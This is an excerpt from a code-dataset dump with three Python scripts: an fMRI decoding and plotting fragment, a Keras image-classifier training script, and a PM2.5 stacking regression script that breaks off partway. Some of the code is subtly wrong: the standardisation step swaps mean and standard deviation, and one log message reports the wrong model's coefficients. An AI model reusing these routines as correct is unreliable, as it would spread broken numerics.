.5],\n color=color, linewidth=linewidth))\n if j + 1 < mask.shape[1] and mask[i, j] != mask[i, j + 1]:\n pl.gca().add_line(Line2D([j + .5, j + .5], [i - .5, i + .5],\n color=color, linewidth=linewidth))\n\n\nfig = pl.figure(figsize=(8, 8))\nax1 = pl.axes([0., 0., 1., 1.])\nsbrain = masking.unmask(lr_coef[0], dataset.mask)\nbg = nibabel.load(os.path.join('utils', 'bg.nii.gz'))\npl.imshow(bg.get_data()[:, :, 10].T, interpolation=\"nearest\", cmap='gray',\n origin='lower')\npl.imshow(np.ma.masked_equal(sbrain[:, :, 10].T, 0.), interpolation=\"nearest\",\n cmap=bluegreen, origin='lower', vmin=0., vmax=2.6)\nplot_lines(contour[:, :, 10].T, color='r')\npl.axis('off')\nax2 = pl.axes([.1, .5, .05, .45])\ncb = pl.colorbar(cax=ax2, ax=ax1)\ncb.ax.yaxis.set_ticks_position('left')\ncb.ax.yaxis.set_tick_params(labelcolor='white')\ncb.ax.yaxis.set_tick_params(labelsize=32)\ncb.set_ticks([0., 1.3, 2.6])\npl.savefig(os.path.join('miyawaki', 'pixel_logistic.pdf'))\npl.savefig(os.path.join('miyawaki', 'pixel_logistic.png'))\npl.savefig(os.path.join('miyawaki', 'pixel_logistic.eps'))\nsys.stderr.write(\"Logistic regression: %d nonzero voxels\\n\" %\n np.sum(lr_coef != 0.))\npl.close()\n\nfig = pl.figure(figsize=(8, 8))\nax1 = pl.axes([0., 0., 1., 1.])\nsbrain = masking.unmask(svc_coef[0], dataset.mask)\nvmax = np.max(np.abs(sbrain[:, :, 10].T))\npl.imshow(bg.get_data()[:, :, 10].T, interpolation=\"nearest\", cmap='gray',\n origin='lower')\npl.imshow(np.ma.masked_equal(sbrain[:, :, 10].T, 0.), interpolation=\"nearest\",\n cmap=bluegreen, origin='lower', vmin=0., vmax=1.0)\nplot_lines(contour[:, :, 10].T, color='r')\npl.axis('off')\nax2 = pl.axes([.1, .5, .05, .45])\ncb = pl.colorbar(cax=ax2, ax=ax1)\ncb.ax.yaxis.set_ticks_position('left')\ncb.ax.yaxis.set_tick_params(labelcolor='white')\ncb.ax.yaxis.set_tick_params(labelsize=28)\ncb.set_ticks([0., .5, 1.])\npl.savefig(os.path.join('miyawaki', 'pixel_svc.pdf'))\npl.savefig(os.path.join('miyawaki', 'pixel_svc.png'))\npl.savefig(os.path.join('miyawaki', 'pixel_svc.eps'))\nsys.stderr.write(\"SVC: %d nonzero voxels\\n\" % np.sum(lr_coef != 0.))\npl.close()\n\n\n### Calcualte the Cross Validation Scores ###################################################\nfrom sklearn.cross_validation import cross_val_score\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.externals.joblib import Parallel, delayed\n\npipeline_LR = Pipeline([('selection', SelectKBest(f_classif, 500)),\n ('clf', LR(penalty=\"l1\", C=0.05))])\npipeline_SVC = Pipeline([('selection', SelectKBest(f_classif, 500)),\n ('clf', LinearSVC(penalty='l1', dual=False, C=0.01))])\npipeline_SVCL2 = Pipeline([('selection', SelectKBest(f_classif, 500)),\n ('clf', LinearSVC(penalty='l2', dual=False, C=0.001))])\n\nsys.stderr.write(\"Cross validation\\n\")\n\nsys.stderr.write(\"\\tLogistic regression...\")\nt0 = time.time()\ncache_path = os.path.join('miyawaki', 'lr_scores.npy')\nif not os.path.exists(cache_path):\n scores_log = Parallel(n_jobs=1)(delayed(cross_val_score)(\n pipeline_LR, X_train, y, cv=5, verbose=True) for y in y_train.T)\n np.save(cache_path, scores_log)\nlr_scores = np.load(cache_path)\nsys.stderr.write(\" Done (%.2fs)\\n\" % (time.time() - t0))\n\nsys.stderr.write(\"\\tSupport vector classifier...\")\nt0 = time.time()\ncache_path = os.path.join('miyawaki', 'svc_scores.npy')\nif not os.path.exists(cache_path):\n scores_svc = Parallel(n_jobs=1)(delayed(cross_val_score)(\n pipeline_SVC, X_train, y, cv=5, verbose=True) for y in y_train.T)\n np.save(cache_path, scores_svc)\nsvc_scores = np.load(cache_path)\nsys.stderr.write(\" Done (%.2fs)\\n\" % (time.time() - t0))\n\nsys.stderr.write(\"\\tSupport vector classifier L2...\")\nt0 = time.time()\ncache_path = os.path.join('miyawaki', 'svcl2_scores.npy')\nif not os.path.exists(cache_path):\n scores_svcl2 = Parallel(n_jobs=1)(delayed(cross_val_score)(\n pipeline_SVCL2, X_train, y, cv=5, verbose=True) for y in y_train.T)\n np.save(cache_path, scores_svcl2)\nsvcl2_scores = np.load(cache_path)\nsys.stderr.write(\" Done (%.2fs)\\n\" % (time.time() - t0))\n\n### Output ####################################################################\n\nfig = pl.figure(figsize=(8, 8))\npl.imshow(np.array(lr_scores).mean(1).reshape(10, 10),\n interpolation=\"nearest\", vmin=.3, vmax=1.)\nplot_lines(pixmask, linewidth=6)\npl.axis('off')\npl.hot()\nfig.subplots_adjust(bottom=0., top=1., left=0., right=1.)\npl.savefig(os.path.join('miyawaki', 'scores_log.pdf'))\npl.savefig(os.path.join('miyawaki', 'scores_log.eps'))\nprint('Logistic Regression mean accuracy: %f' % lr_scores.mean())\npl.close()\n\n\nfig = pl.figure(figsize=(8, 8))\npl.imshow(np.array(svc_scores).mean(1).reshape(10, 10),\n interpolation=\"nearest\", vmin=.3, vmax=1.)\nplot_lines(pixmask, linewidth=6)\npl.axis('off')\npl.hot()\nfig.subplots_adjust(bottom=0., top=1., left=0., right=1.)\npl.savefig(os.path.join('miyawaki', 'scores_svc.pdf'))\npl.savefig(os.path.join('miyawaki', 'scores_svc.eps'))\nprint('SVC L1 mean accuracy: %f' % svc_scores.mean())\npl.close()\n\n\nfig = pl.figure(figsize=(8, 8))\npl.imshow(np.array(svcl2_scores).mean(1).reshape(10, 10),\n interpolation=\"nearest\", vmin=.3, vmax=1.)\nplot_lines(pixmask, linewidth=6)\npl.axis('off')\npl.hot()\nfig.subplots_adjust(bottom=0., top=1., left=0., right=1.)\npl.savefig(os.path.join('miyawaki', 'scores_svcl2.pdf'))\npl.savefig(os.path.join('miyawaki', 'scores_svcl2.eps'))\nprint('SVC L2 mean accuracy: %f' % svcl2_scores.mean())\npl.close()\n\n### Plot the colorbar #########################################################\nimport matplotlib as mpl\n\n\nfig = pl.figure(figsize=(.6, 3.6))\ncmap = mpl.cm.hot\nnorm = mpl.colors.Normalize(vmin=.3, vmax=1.)\ncb = mpl.colorbar.ColorbarBase(pl.gca(), cmap=cmap, norm=norm)\n# cb.ax.yaxis.set_ticks_position('left')\ncb.set_ticks(np.arange(0.3, 1.1, 0.1))\nfig.subplots_adjust(bottom=0.03, top=.97, left=0., right=.5)\npl.savefig(os.path.join('miyawaki', 'scores_colorbar.png'))\npl.savefig(os.path.join('miyawaki', 'scores_colorbar.pdf'))\npl.savefig(os.path.join('miyawaki', 'scores_colorbar.eps'))\n","repo_name":"AlexandreAbraham/frontiers2013","sub_path":"scripts/miyawaki_decoding.py","file_name":"miyawaki_decoding.py","file_ext":"py","file_size_in_byte":9498,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"3"} +{"seq_id":"852838332","text":"import json\nimport shutil\nimport os\nimport pickle\nfrom callback import MultipleClassAUROC, MultiGPUModelCheckpoint\nfrom configparser import ConfigParser\nfrom generator import AugmentedImageSequence\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau\nfrom keras.optimizers import Adam\nfrom keras.utils import multi_gpu_model\nfrom models.keras import ModelFactory\nfrom utility import get_sample_counts\nfrom weights import get_class_weights\nfrom augmenter import augmenter\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\nset_session(sess)\n\n\ndef main():\n config_file = \"config.ini\"\n cp = ConfigParser()\n cp.read(config_file)\n\n output_dir = cp[\"DEFAULT\"].get(\"output_dir\")\n image_source_dir = cp[\"DEFAULT\"].get(\"image_source_dir\")\n base_model_name = cp[\"DEFAULT\"].get(\"base_model_name\")\n class_names = cp[\"DEFAULT\"].get(\"class_names\").split(\",\")\n\n use_base_model_weights = cp[\"TRAIN\"].getboolean(\"use_base_model_weights\")\n use_trained_model_weights = cp[\"TRAIN\"].getboolean(\"use_trained_model_weights\")\n use_best_weights = cp[\"TRAIN\"].getboolean(\"use_best_weights\")\n output_weights_name = cp[\"TRAIN\"].get(\"output_weights_name\")\n epochs = cp[\"TRAIN\"].getint(\"epochs\")\n batch_size = cp[\"TRAIN\"].getint(\"batch_size\")\n initial_learning_rate = cp[\"TRAIN\"].getfloat(\"initial_learning_rate\")\n generator_workers = cp[\"TRAIN\"].getint(\"generator_workers\")\n image_dimension = cp[\"TRAIN\"].getint(\"image_dimension\")\n train_steps = cp[\"TRAIN\"].get(\"train_steps\")\n patience_reduce_lr = cp[\"TRAIN\"].getint(\"patience_reduce_lr\")\n min_lr = cp[\"TRAIN\"].getfloat(\"min_lr\")\n validation_steps = cp[\"TRAIN\"].get(\"validation_steps\")\n positive_weights_multiply = cp[\"TRAIN\"].getfloat(\"positive_weights_multiply\")\n dataset_csv_dir = cp[\"TRAIN\"].get(\"dataset_csv_dir\")\n \n if use_trained_model_weights:\n training_stats_file = os.path.join(output_dir, \".training_stats.json\")\n if os.path.isfile(training_stats_file):\n training_stats = json.load(open(training_stats_file))\n else:\n training_stats = {}\n else:\n training_stats = {}\n\n show_model_summary = cp[\"TRAIN\"].getboolean(\"show_model_summary\")\n\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n\n running_flag_file = os.path.join(output_dir, \".training.lock\")\n if os.path.isfile(running_flag_file):\n raise RuntimeError(\"A process is running in this directory!!!\")\n else:\n open(running_flag_file, \"a\").close()\n try:\n shutil.copy(config_file, os.path.join(output_dir, os.path.split(config_file)[1]))\n\n datasets = [\"train\", \"valid\"]\n for dataset in datasets:\n shutil.copy(os.path.join(dataset_csv_dir, dataset + '.csv'), output_dir)\n\n train_counts, train_pos_counts = get_sample_counts(output_dir, \"train\", class_names)\n dev_counts, _ = get_sample_counts(output_dir, \"valid\", class_names)\n\n if train_steps == \"auto\":\n train_steps = int(train_counts / batch_size)\n else:\n try:\n train_steps = int(train_steps)\n except ValueError:\n raise ValueError(\"\"\"\n train_steps: {train_steps} is invalid,\n use 'auto' or integer.\n \"\"\")\n\n if validation_steps == \"auto\":\n validation_steps = int(dev_counts / batch_size)\n else:\n try:\n validation_steps = int(validation_steps)\n except ValueError:\n raise ValueError(\"\"\"\n validation_steps: {validation_steps} is invalid,\n use 'auto' or integer.\n \"\"\")\n class_weights = get_class_weights(\n train_counts,\n train_pos_counts,\n multiply=positive_weights_multiply,\n )\n\n if use_trained_model_weights:\n if use_best_weights:\n model_weights_file = os.path.join(output_dir, \"best_\" + output_weights_name)\n else:\n model_weights_file = os.path.join(output_dir, output_weights_name)\n else:\n model_weights_file = None\n\n model_factory = ModelFactory()\n model = model_factory.get_model(\n class_names,\n model_name=base_model_name,\n use_base_weights=use_base_model_weights,\n weights_path=model_weights_file,\n input_shape=(image_dimension, image_dimension, 3))\n\n if show_model_summary:\n print(model.summary())\n\n train_sequence = AugmentedImageSequence(\n dataset_csv_file=os.path.join(output_dir, \"train.csv\"),\n class_names=class_names,\n source_image_dir=image_source_dir,\n batch_size=batch_size,\n target_size=(image_dimension, image_dimension),\n augmenter=augmenter,\n steps=train_steps,\n )\n validation_sequence = AugmentedImageSequence(\n dataset_csv_file=os.path.join(output_dir, \"valid.csv\"),\n class_names=class_names,\n source_image_dir=image_source_dir,\n batch_size=batch_size,\n target_size=(image_dimension, image_dimension),\n augmenter=augmenter,\n steps=validation_steps,\n shuffle_on_epoch_end=False,\n )\n\n output_weights_path = os.path.join(output_dir, output_weights_name)\n gpus = len(os.getenv(\"CUDA_VISIBLE_DEVICES\", \"1\").split(\",\"))\n if gpus > 1:\n model_train = multi_gpu_model(model, gpus)\n checkpoint = MultiGPUModelCheckpoint(\n filepath=output_weights_path,\n base_model=model,\n )\n else:\n model_train = model\n checkpoint = ModelCheckpoint(\n output_weights_path,\n save_weights_only=True,\n save_best_only=True,\n verbose=1,\n )\n\n optimizer = Adam(lr=initial_learning_rate)\n model_train.compile(optimizer=optimizer, loss=\"binary_crossentropy\")\n auroc = MultipleClassAUROC(\n sequence=validation_sequence,\n class_names=class_names,\n weights_path=output_weights_path,\n stats=training_stats,\n workers=generator_workers,\n )\n callbacks = [\n checkpoint,\n TensorBoard(log_dir=os.path.join(output_dir, \"logs\"), batch_size=batch_size),\n ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=patience_reduce_lr,\n verbose=1, mode=\"min\", min_lr=min_lr),\n auroc,\n ]\n\n history = model_train.fit_generator(\n generator=train_sequence,\n steps_per_epoch=train_steps,\n epochs=epochs,\n validation_data=validation_sequence,\n validation_steps=validation_steps,\n callbacks=callbacks,\n class_weight=class_weights,\n workers=generator_workers,\n shuffle=False,\n )\n\n with open(os.path.join(output_dir, \"history.pkl\"), \"wb\") as f:\n pickle.dump({\n \"history\": history.history,\n \"auroc\": auroc.aurocs,\n }, f)\n\n finally:\n os.remove(running_flag_file)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"anondo1969/SHAMSUL","sub_path":"codes/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"10665847877","text":"# -*- coding:utf-8 -*-\r\n# &Author AnFany\r\n\r\n# 两层的Stacking回归\r\nfrom wxpy import *\r\nbot = Bot(cache_path=True)\r\n\r\n# 第一层6个模型:随机森林,AdaBoost,GBDT,LightGBM,XGBoost,CatBoost\r\n# 第二层模型:BP神经网络回归\r\n\r\n# 引入数据文件\r\nimport pm25_Stacking_Data as pm25\r\n\r\n# 引入绘图库包\r\nimport matplotlib.pyplot as plt\r\nfrom pylab import mpl\r\nmpl.rcParams['font.sans-serif'] = ['FangSong'] # 显示中文\r\nmpl.rcParams['axes.unicode_minus'] = False # 显示负号\r\n\r\n# 引入需要用到的模型的库包\r\n# 随机森林\r\nfrom sklearn.ensemble import RandomForestRegressor as RF\r\n# AdaBoost\r\nfrom sklearn.ensemble import AdaBoostRegressor\r\nfrom sklearn.tree import DecisionTreeRegressor\r\n# GBDT\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\n# XGBoost\r\nimport xgboost as xgb\r\n# LightGBM\r\nimport lightgbm as lgbm\r\n# CatBoost\r\nimport catboost as cb\r\n# BP神经网络回归\r\nimport BP_Regression as bp\r\n\r\n# 其他库包\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom collections import OrderedDict # python字典是无序的,此包是有序的\r\nimport os\r\nos.chdir(r'E:\\tensorflow_Learn\\Stacking\\pm25')\r\n'''\r\n第一部分:数据处理模型\r\n'''\r\n\r\nclass DATA:\r\n\r\n def __init__(self, datadict=pm25.data_dict, mubiao='pm2.5'):\r\n self.data = datadict\r\n self.k = 8 # 因为需要对每个模型进行单独的数据处理,因此这个折数对于每个模型都必须是一样的\r\n\r\n # 训练数据\r\n self.chidata = self.data['train']\r\n\r\n # 预测数据\r\n self.nodata = self.data['predict']\r\n\r\n # 类别型数据的编号\r\n self.catsign = self.Sign()\r\n\r\n # 目标字段\r\n self.ziduan = mubiao\r\n\r\n # 对于归一化化和标准化的处理,要记录转化的值,在这里将2者统一。反处理时,预测值需要乘以self.fenmu 加上self.cha\r\n self.fenmu = 1 # 相当于标准化的标准差, 归一化的最大值减去最小值\r\n self.cha = 0 # 相当于标准化的平均值, 归一化的最小值\r\n\r\n # 因为对于CatBoost而言,不需要进行类别型特征的处理,但是需要类别型特征的标号\r\n def Sign(self):\r\n sign = []\r\n numlist = self.chidata.values[0][: -1] # 不包括最后的目标字段\r\n for jj in range(len(numlist)):\r\n try:\r\n numlist[jj] + 9\r\n except TypeError:\r\n sign.append(jj)\r\n return sign\r\n\r\n # 类别型特征数字标签化函数,\r\n def CAtoDI(self):\r\n # 如果特征值不能执行数字加法运算,则视为类别型特征\r\n for tezheng in self.chidata:\r\n try:\r\n self.chidata[tezheng].values[0] + 1\r\n except TypeError:\r\n numlist = sorted(list(set(list(self.chidata[tezheng]))))\r\n self.chidata[tezheng] = [numlist.index(hh) for hh in self.chidata[tezheng]]\r\n try:\r\n self.nodata[tezheng] = [numlist.index(ss) for ss in self.nodata[tezheng]]\r\n except ValueError:\r\n print('特征%s:预测比训练的多了值' % (tezheng))\r\n return print('数字化处理完毕')\r\n\r\n # 对于归一化和标准化的函数,要记录目标字段的转化值,因为要进行反归一化\r\n\r\n # 归一化函数\r\n def Normal(self):\r\n # 在此之前需要把类别型标签去掉,否则会报错\r\n for tezheng in self.chidata:\r\n maxnum = max(list(self.chidata[tezheng]))\r\n minum = min(list(self.chidata[tezheng]))\r\n if maxnum == minum:\r\n self.chidata[tezheng] = [1 for hh in self.chidata[tezheng]]\r\n self.nodata[tezheng] = [1 for ss in self.nodata[tezheng]]\r\n else:\r\n self.chidata[tezheng] = [(hh - minum) / (maxnum - minum) for hh in self.chidata[tezheng]]\r\n self.nodata[tezheng] = [(ss - minum) / (maxnum - minum) for ss in self.nodata[tezheng]]\r\n if tezheng == self.ziduan:\r\n self.fenmu = maxnum - minum\r\n self.cha = minum\r\n return print('归一化处理完毕')\r\n\r\n # 标准化函数\r\n def Stand(self):\r\n # 在此之前需要把类别型标签去掉,否则会报错\r\n for tezheng in self.chidata:\r\n standnum = np.std(np.array(list(self.chidata[tezheng])), ddof=1) # 计算有偏的标准差\r\n meanum = np.mean(np.array(list(self.chidata[tezheng])))\r\n\r\n if meanum == 0:\r\n self.chidata[tezheng] = [1 for hh in self.chidata[tezheng]]\r\n self.nodata[tezheng] = [1 for ss in self.nodata[tezheng]]\r\n else:\r\n self.chidata[tezheng] = [(hh - standnum) / meanum for hh in self.chidata[tezheng]]\r\n self.nodata[tezheng] = [(ss - standnum) / meanum for ss in self.nodata[tezheng]]\r\n if tezheng == self.ziduan:\r\n self.fenmu = standnum\r\n self.cha = meanum\r\n return print('标准化处理完毕')\r\n\r\n # 定义Kfold的函数,也就是将原始的训练数据集分为k对训练数据和验证数据的组合\r\n def Kfold(self):\r\n # 因为每个模型需要将验证数据结合的结果集成起来,为了方便起见,在这里固定每一折数中的数据集合\r\n datanum = self.chidata.values\r\n # 数据集总长度\r\n length = len(datanum)\r\n alist = np.arange(length)\r\n np.random.seed(1990)\r\n np.random.shuffle(alist) # 随机打乱数据对BPNN,SVM而言是有益处的,而对于决策树之类的模型而言没有影响\r\n\r\n # 验证数据的长度\r\n yanlem = int(length / self.k)\r\n\r\n # 存储数据集的字典\r\n datai = {}\r\n datai['predict'] = self.nodata.values\r\n\r\n # 开始处理Kfold\r\n for kk in range(self.k):\r\n datai[kk] = OrderedDict()\r\n if kk == 0:\r\n datai[kk]['train'] = datanum[alist[(kk + 1) * yanlem:]]\r\n datai[kk]['test'] = datanum[alist[: (kk + 1) * yanlem]]\r\n elif kk == self.k - 1:\r\n datai[kk]['train'] = datanum[alist[: kk * yanlem]]\r\n datai[kk]['test'] = datanum[alist[kk * yanlem:]]\r\n else:\r\n datai[kk]['test'] = datanum[alist[kk * yanlem: (kk + 1) * yanlem]]\r\n signlist = list(alist[: kk * yanlem]) + list(alist[(kk + 1) * yanlem:])\r\n datai[kk]['train'] = datanum[signlist]\r\n # 返回的数据集形式{0:{'train':data, 'test':data},……,self.k-1:{'train':data, 'test':data}, 'predict':data}\r\n print('K折处理完毕')\r\n return datai\r\n\r\n\r\n'''\r\n第二部分:第一层的模型运行阶段\r\n'''\r\n# 可以任意添加模型\r\nclass MODELONE:\r\n\r\n def __init__(self, zidan='pm2.5'):\r\n\r\n # 验证数据集的预测结果\r\n self.yanzhneg_pr = []\r\n\r\n # 验证数据集的真实结果\r\n self.yanzhneg_real = []\r\n\r\n # 预测数据集的预测结果\r\n self.predi = []\r\n\r\n # 预测数据集的真实结果\r\n self.preal = []\r\n\r\n # 目标字段名称\r\n self.zi = zidan\r\n\r\n # 数据结构和数据处理类的保持一致,要把验证数据集的输入和真实的输出合二为一\r\n self.datai = {}\r\n\r\n # 记录每个模型最终误差的字典\r\n self.error_dict = OrderedDict()\r\n\r\n # 将第一层的结果转换为何数据结构处理类中一样的数据结构的函数\r\n # 也就是{'train':dataframe, 'predict':dataframe}样式的字典\r\n def DataStru(self):\r\n self.datai['train'] = np.row_stack((np.array(self.yanzhneg_pr), np.array(self.yanzhneg_real))) # 此处添加行\r\n self.datai['predict'] = np.row_stack((np.array(self.predi), np.array(self.preal)))\r\n # 将训练数据转置\r\n datapst = self.datai['train'].T\r\n # 为训练数据定义DataFrame的列名\r\n mingcheng = ['第%s个模型列' % str(dd) for dd in list(range(len(self.datai['train']) - 1))] + [self.zi]\r\n self.datai['train'] = pd.DataFrame(datapst, columns=mingcheng)\r\n\r\n # 将预测数据转置\r\n dapst = self.datai['predict'].T\r\n # 为训练数据定义DataFrame的列名\r\n mingche= ['第%s个模型列' % str(dd) for dd in list(range(len(self.datai['predict']) - 1))] + [self.zi]\r\n self.datai['predict'] = pd.DataFrame(dapst, columns=mingche)\r\n return print('二层的数据准备完毕')\r\n\r\n # 定义均方误差的函数\r\n def RMSE(self, data1, data2):\r\n data1, data2 = np.array(data1), np.array(data2)\r\n subdata = np.power(data1 - data2, 2)\r\n return np.sqrt(np.sum(subdata) / len(subdata - 1))\r\n\r\n # 随机森林\r\n def RF_First(self, data, n_estimators=4000, max_features='auto'):\r\n # 存储每一折中验证数据集的预测结果\r\n yanzhenglist = []\r\n # 存储每一折中验证数据集的真实结果\r\n yanzhenglist_real = []\r\n # 存储每一折中预测数据集的预测结果\r\n prelist = []\r\n\r\n # 存储训练、验证、预测数据的误差\r\n errorlsit = []\r\n # 开始每一折的训练,因为这个折数的字典是有序的,因此不用考虑每一折的顺序。\r\n for zhe in [zheshu for zheshu in data.keys() if zheshu != 'predict']:\r\n model = RF(n_estimators=n_estimators, max_features=max_features)\r\n model.fit(data[zhe]['train'][:, :-1], data[zhe]['train'][:, -1])\r\n # 注意存储验证数据集结果和预测数据集结果的不同\r\n # 训练数据集的预测结果\r\n xul = model.predict(data[zhe]['train'][:, :-1])\r\n # 验证的预测结果\r\n yanre = model.predict(data[zhe]['test'][:, :-1])\r\n #预测的预测结果\r\n prer = model.predict(data['predict'][:, :-1])\r\n\r\n yanzhenglist += list(yanre)\r\n yanzhenglist_real += list(data[zhe]['test'][:, -1])\r\n prelist.append(prer)\r\n # 每计算一折后,要计算训练、验证、预测数据的误差\r\n xx = self.RMSE(xul, data[zhe]['train'][:, -1])\r\n\r\n yy = self.RMSE(yanre, data[zhe]['test'][:, -1])\r\n\r\n pp = self.RMSE(prer, data['predict'][:, -1])\r\n\r\n errorlsit.append([xx, yy, pp])\r\n # 针对预测数据集的预测结果计算均值\r\n meanPre = np.mean(np.array(prelist), axis=0)\r\n # 开始结合\r\n self.yanzhneg_pr.append(yanzhenglist)\r\n self.yanzhneg_real = yanzhenglist_real\r\n self.predi.append(meanPre)\r\n self.preal = data['predict'][:, -1]\r\n\r\n # 储存误差\r\n self.error_dict['随机森林'] = np.mean(np.array(errorlsit), axis=0)\r\n return print('1层中的随机森林运行完毕')\r\n\r\n # AdaBoost\r\n def Adaboost_First(self, data, max_depth=50, n_estimators=1000):\r\n # 存储每一折中验证数据集的预测结果\r\n yanzhenglist = []\r\n # 存储每一折中验证数据集的真实结果\r\n yanzhenglist_real = []\r\n # 存储每一折中预测数据集的预测结果\r\n prelist = []\r\n\r\n # 存储训练、验证、预测数据的误差\r\n errorlsit = []\r\n\r\n # 开始每一折的训练\r\n for zhe in [zheshu for zheshu in data.keys() if zheshu != 'predict']:\r\n model = AdaBoostRegressor(DecisionTreeRegressor(max_depth=max_depth),\r\n n_estimators=n_estimators, learning_rate=0.8)\r\n model.fit(data[zhe]['train'][:, :-1], data[zhe]['train'][:, -1])\r\n # 注意存储验证数据集结果和预测数据集结果的不同\r\n # 训练数据集的预测结果\r\n xul = model.predict(data[zhe]['train'][:, :-1])\r\n # 验证的预测结果\r\n yanre = model.predict(data[zhe]['test'][:, :-1])\r\n #预测的预测结果\r\n prer = model.predict(data['predict'][:, :-1])\r\n yanzhenglist += list(yanre)\r\n yanzhenglist_real += list(data[zhe]['test'][:, -1])\r\n prelist.append(prer)\r\n\r\n # 每计算一折后,要计算训练、验证、预测数据的误差\r\n xx = self.RMSE(xul, data[zhe]['train'][:, -1])\r\n\r\n yy = self.RMSE(yanre, data[zhe]['test'][:, -1])\r\n\r\n pp = self.RMSE(prer, data['predict'][:, -1])\r\n\r\n errorlsit.append([xx, yy, pp])\r\n\r\n # 针对预测数据集的预测结果计算均值\r\n meanPre = np.mean(np.array(prelist), axis=0)\r\n # 开始结合\r\n self.yanzhneg_pr.append(yanzhenglist)\r\n self.yanzhneg_real = yanzhenglist_real\r\n self.predi.append(meanPre)\r\n self.preal = data['predict'][:, -1]\r\n # 储存误差\r\n self.error_dict['AdaBoost'] = np.mean(np.array(errorlsit), axis=0)\r\n\r\n return print('1层中的AdaBoost运行完毕')\r\n\r\n # GBDT\r\n def GBDT_First(self, data, max_depth=17, n_estimators=57):\r\n # 存储每一折中验证数据集的预测结果\r\n yanzhenglist = []\r\n # 存储每一折中验证数据集的真实结果\r\n yanzhenglist_real = []\r\n # 存储每一折中预测数据集的预测结果\r\n prelist = []\r\n\r\n # 存储训练、验证、预测数据的误差\r\n errorlsit = []\r\n # 开始每一折的训练\r\n for zhe in [zheshu for zheshu in data.keys() if zheshu != 'predict']:\r\n model = GradientBoostingRegressor(loss='ls', n_estimators=n_estimators, max_depth=max_depth,\r\n learning_rate=0.12, subsample=0.8)\r\n model.fit(data[zhe]['train'][:, :-1], data[zhe]['train'][:, -1])\r\n # 注意存储验证数据集结果和预测数据集结果的不同\r\n # 训练数据集的预测结果\r\n xul = model.predict(data[zhe]['train'][:, :-1])\r\n # 验证的预测结果\r\n yanre = model.predict(data[zhe]['test'][:, :-1])\r\n # 预测的预测结果\r\n prer = model.predict(data['predict'][:, :-1])\r\n yanzhenglist += list(yanre)\r\n yanzhenglist_real += list(data[zhe]['test'][:, -1])\r\n prelist.append(prer)\r\n\r\n # 每计算一折后,要计算训练、验证、预测数据的误差\r\n xx = self.RMSE(xul, data[zhe]['train'][:, -1])\r\n\r\n yy = self.RMSE(yanre, data[zhe]['test'][:, -1])\r\n\r\n pp = self.RMSE(prer, data['predict'][:, -1])\r\n\r\n errorlsit.append([xx, yy, pp])\r\n\r\n # 针对预测数据集的预测结果计算均值\r\n meanPre = np.mean(np.array(prelist), axis=0)\r\n # 开始结合\r\n self.yanzhneg_pr.append(yanzhenglist)\r\n self.yanzhneg_real = yanzhenglist_real\r\n self.predi.append(meanPre)\r\n self.preal = data['predict'][:, -1]\r\n # 储存误差\r\n self.error_dict['GBDT'] = np.mean(np.array(errorlsit), axis=0)\r\n\r\n return print('1层中的GBDT运行完毕')\r\n\r\n # LightGBM\r\n def LightGBM_First(self, data, max_depth=9, n_estimators=380):\r\n # 存储每一折中验证数据集的预测结果\r\n yanzhenglist = []\r\n # 存储每一折中验证数据集的真实结果\r\n yanzhenglist_real = []\r\n # 存储每一折中预测数据集的预测结果\r\n prelist = []\r\n\r\n # 存储训练、验证、预测数据的误差\r\n errorlsit = []\r\n # 开始每一折的训练\r\n for zhe in [zheshu for zheshu in data.keys() if zheshu != 'predict']:\r\n model = lgbm.LGBMRegressor(boosting_type='gbdt', objective='regression', num_leaves=1200,\r\n learning_rate=0.17, n_estimators=n_estimators, max_depth=max_depth,\r\n metric='rmse', bagging_fraction=0.8, feature_fraction=0.8, reg_lambda=0.9)\r\n\r\n model.fit(data[zhe]['train'][:, :-1], data[zhe]['train'][:, -1])\r\n # 注意存储验证数据集结果和预测数据集结果的不同\r\n # 训练数据集的预测结果\r\n xul = model.predict(data[zhe]['train'][:, :-1])\r\n # 验证的预测结果\r\n yanre = model.predict(data[zhe]['test'][:, :-1])\r\n # 预测的预测结果\r\n prer = model.predict(data['predict'][:, :-1])\r\n yanzhenglist += list(yanre)\r\n yanzhenglist_real += list(data[zhe]['test'][:, -1])\r\n prelist.append(prer)\r\n # 每计算一折后,要计算训练、验证、预测数据的误差\r\n xx = self.RMSE(xul, data[zhe]['train'][:, -1])\r\n yy = self.RMSE(yanre, data[zhe]['test'][:, -1])\r\n pp = self.RMSE(prer, data['predict'][:, -1])\r\n errorlsit.append([xx, yy, pp])\r\n # 针对预测数据集的预测结果计算均值\r\n meanPre = np.mean(np.array(prelist), axis=0)\r\n # 开始结合\r\n self.yanzhneg_pr.append(yanzhenglist)\r\n self.yanzhneg_real = yanzhenglist_real\r\n self.predi.append(meanPre)\r\n self.preal = data['predict'][:, -1]\r\n # 储存误差\r\n self.error_dict['LightGBM'] = np.mean(np.array(errorlsit), axis=0)\r\n\r\n return print('1层中的LightGBM运行完毕')\r\n\r\n # XGBoost\r\n def XGBoost_First(self, data, max_depth=50, n_estimators=220):\r\n # 存储每一折中验证数据集的预测结果\r\n yanzhenglist = []\r\n # 存储每一折中验证数据集的真实结果\r\n yanzhenglist_real = []\r\n # 存储每一折中预测数据集的预测结果\r\n prelist = []\r\n # 存储训练、验证、预测数据的误差\r\n errorlsit = []\r\n # 开始每一折的训练\r\n for zhe in [zheshu for zheshu in data.keys() if zheshu != 'predict']:\r\n model = xgb.XGBRegressor(max_depth=max_depth, learning_rate=0.1, n_estimators=n_estimators,\r\n silent=True, objective='reg:gamma')\r\n model.fit(data[zhe]['train'][:, :-1], data[zhe]['train'][:, -1])\r\n # 注意存储验证数据集结果和预测数据集结果的不同\r\n # 训练数据集的预测结果\r\n xul = model.predict(data[zhe]['train'][:, :-1])\r\n # 